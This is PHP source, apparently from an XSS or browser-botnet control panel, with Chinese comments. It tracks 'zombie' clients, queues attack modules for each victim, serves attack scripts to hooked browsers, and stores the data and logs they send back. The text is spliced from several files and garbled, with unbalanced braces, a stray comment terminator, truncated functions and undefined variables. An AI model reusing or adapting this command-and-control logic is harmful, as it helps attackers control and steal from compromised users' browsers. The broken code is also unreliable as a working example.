header("Content-Length: 0");
ob_end_flush();
require_once "../bin/Path.php";
require_once PHP_BASE_DIR . "/db/MySQL.php";
require_once PHP_BASE_DIR . "/util/util.php";
require_once PHP_BASE_DIR . "/entity/Project.php";
require_once PHP_BASE_DIR . "/entity/ProjectModuleData.php";
require_once PHP_BASE_DIR . "/entity/AttackData.php";
$res = "{}";
if (!empty($_REQUEST["t"]) && !empty($_REQUEST["i"]) && $_REQUEST["i"] !== "null" && !empty($_REQUEST["s"])) {
$ticket = $_REQUEST["t"];
$pmd_id = $_REQUEST["i"];
$stat = $_REQUEST["s"] === "online" ? 1 : 0;
$db = new MySQL($log);
if ($mysqli = $db->openDB()) {
$pmd = new ProjectModuleData($mysqli, $log);
$attackData = new AttackData($mysqli, $log);
//更新客户端状态
if (!$pmd->updateStatus($pmd_id, $stat)) {
$log->error("update zombie status failed!");
}
//发送攻击模块 (队列形式发送) 先进先出
//更新攻击模块队列的状态 若超时,则判定攻击失败 默认15s超时
$attackData->updateAttackStatus($pmd_id, 15);
$attack = $attackData->fetchModuleToAttack($pmd_id);
if ($attack) {
$attackData->setStatus($attack['id'], 2);
//读取脚本文件
$s = new SaeStorage();
$content = $s->fileExists(SAE_STORAGE_DOMAIN, SAE_MODULES . "/" . basename($attack['m_path'])) ? $s->read(SAE_STORAGE_DOMAIN, SAE_MODULES . "/" . basename($attack['m_path'])) . "\n" : "";
//基本配置
$ec = $_REQUEST["ec"];
if (empty($pmd_id) || $pmd_id == "undefined" || $pmd_id == "null") {
$pmd_id = 0;
} else {
$pmd_id = (int) $pmd_id;
}
if (empty($a_id) || $a_id == "undefined" || $a_id == "null") {
$a_id = 0;
} else {
$a_id = (int) $a_id;
}
$db = new MySQL($log);
$mysqli = $db->openDB();
if ($mysqli !== null) {
$project = new Project($mysqli, $log);
$pmd = new ProjectModuleData($mysqli, $log);
$attackData = new AttackData($mysqli, $log);
//如果 pmd_id 和 a_id 存在 说明是已经上线的主机
if ($pmd_id > 0 && $a_id > 0) {
$pmd->updateStatus($pmd_id, 1);
//更新客户端状态信息为在线
//更新攻击数据
$attackData->updateData($a_id, urldecode($data));
} else {
//如果 pmd_id 和 a_id 都不存在 说明是下线的主机或者新的主机
$res = $pmd->getPmdByEC($ec, $ticket);
if ($res) {
//在之前已经有记录 是刚上线的主机
$pmd_id = $pmd->pmd_id;
$pmd->updateStatus($pmd_id, 1);
//更新客户端状态信息为在线
}
} else {
$content = stripslashes($content);
}
} else {
}
return $content;
}
$res = "{}";
if (!empty($_REQUEST["i"]) && $_REQUEST["i"] !== "null" && $_REQUEST["i"] !== "undefined" && !empty($_REQUEST["t"]) && !empty($_REQUEST["l"])) {
$ticket = $_REQUEST["t"];
$logMsg = $_REQUEST["l"];
$pmd_id = $_REQUEST["i"];
$db = new MySQL($log);
if ($mysqli = $db->openDB()) {
$pmd = new ProjectModuleData($mysqli, $log);
$attackLog = new AttackLog($mysqli, $log);
//如果 pmd_id 已存在
if (!$pmd->updateStatus($pmd_id, 1)) {
//更新客户端状态信息为在线
$log->error("update zombie status failed!");
}
if ($attackLog->insertLog($pmd_id, quotes($logMsg))) {
$res = "{}";
}
$db->closeDB();
} else {
$log->error("Open database connection failed!");
}
}
echo $res;
if (empty($data) || $data === null) {
$res["reason"] = "Post Data Illegal";
die(json_encode($res));
}
/**
* validate power
*/
if (!isset($_SESSION['user_info']) || empty($_SESSION['user_info'])) {
$res["reason"] = "u are not login";
die(json_encode($res));
}
$db = new MySQL($log);
$mysqli = $db->openDB();
if ($mysqli !== null) {
$project = new Project($mysqli, $log);
$pmd = new ProjectModuleData($mysqli, $log);
if ($data["op"] === "del") {
foreach ($data['data'] as $deldata) {
$project->getProjectById($deldata["p_id"]);
if ($project->u_id === $_SESSION['user_info']['id']) {
//判断project的所有者是否是当前用户
if ($pmd->delPMD($deldata["pmd_id"], $deldata["p_id"])) {
$res["result"] = true;
$res["reason"] = "Delete data success!";
} else {
$res["result"] = false;
$res["reason"] = "Delete data failed!";
$db->closeDB();
die(json_encode($res));
}
} else {
*/
if (!isset($_SESSION['user_info']) || empty($_SESSION['user_info'])) {
$res["reason"] = "u are not login";
die(json_encode($res));
}
$data = json_decode(file_get_contents('php://input'), true);
$res = array("result" => false, "reason" => "");
if (empty($data) || $data === null) {
$res["reason"] = "Data Illegal";
die(json_encode($res));
}
$db = new MySQL($log);
if ($mysqli = $db->openDB()) {
$user = new User($mysqli, $log);
$module = new Module($mysqli, $log);
$pmd = new ProjectModuleData($mysqli, $log);
$attackData = new AttackData($mysqli, $log);
$attackLog = new AttackLog($mysqli, $log);
//load attack module
if ($data['op'] === 'load') {
if ($module->getModuleByID($data['m_id'])) {
$md = $module->getFields();
$md["author"] = $user->getUserByID($md['author_id']) ? $user->username : '******';
$res["result"] = true;
$res["reason"] = $md;
}
}
//send attack script
if ($data['op'] === 'attack') {
// do attack
if (!empty($data['pmd_id']) && !empty($data['m_id'])) {
<!-- the head begind -->
<?php
include "./include/head.php";
?>
<!-- the head end -->
<?php
require_once "bin/Path.php";
require_once PHP_BASE_DIR . "/db/MySQL.php";
require_once PHP_BASE_DIR . "/entity/Module.php";
require_once PHP_BASE_DIR . "/entity/Project.php";
require_once PHP_BASE_DIR . "/entity/ProjectModuleData.php";
$pmd_id = $_GET['pmd_id'];
$pmd_id = $pmd_id ? (int) htmlspecialchars($pmd_id, ENT_QUOTES, 'UTF-8') : 0;
$db = new MySQL($log);
if ($pmd_id > 0 && ($mysqli = $db->openDB())) {
$pmdData = new ProjectModuleData($mysqli, $log);
if (!$pmdData->getPmdByID($pmd_id)) {
echo "<script>alert('未找到记录!');history.back();</script>";
}
$u_id = $pmdData->getUidOfPmdId($pmd_id);
if ((int) $user_info['id'] !== (int) $u_id) {
echo "<script>alert('您无权操作!');history.back();</script>";
}
} else {
echo "<script>alert('数据错误!');history.back();</script>";
}
?>
<!-- main begin -->
<div class="container">
<!--the row jumb begin-->
<!-- the head end -->
<?php
require_once "bin/Path.php";
require_once PHP_BASE_DIR . "/db/MySQL.php";
require_once PHP_BASE_DIR . "/entity/Module.php";
require_once PHP_BASE_DIR . "/entity/Project.php";
require_once PHP_BASE_DIR . "/entity/ProjectModuleData.php";
$p_id = $_GET['p_id'];
$p_id = $p_id ? (int) $p_id : 0;
$res = false;
if ($p_id > 0) {
$db = new MySQL($log);
$mysqli = $db->openDB();
if ($mysqli != null) {
$project = new Project($mysqli, $log);
$pmData = new ProjectModuleData($mysqli, $log);
$module = new Module($mysqli, $log);
$res = $project->getProjectById($p_id);
if ($res && $user_info['id'] === $project->u_id) {
// 如果项目存在且拥有者是当前用户
$pmDatas = $pmData->getPMDByProject($p_id);
$module->getModuleByID($project->m_id);
$pmd_num = count($pmDatas);
}
}
}
?>
<!-- main begin -->
<div class="container">
<!--the row jumb begin-->
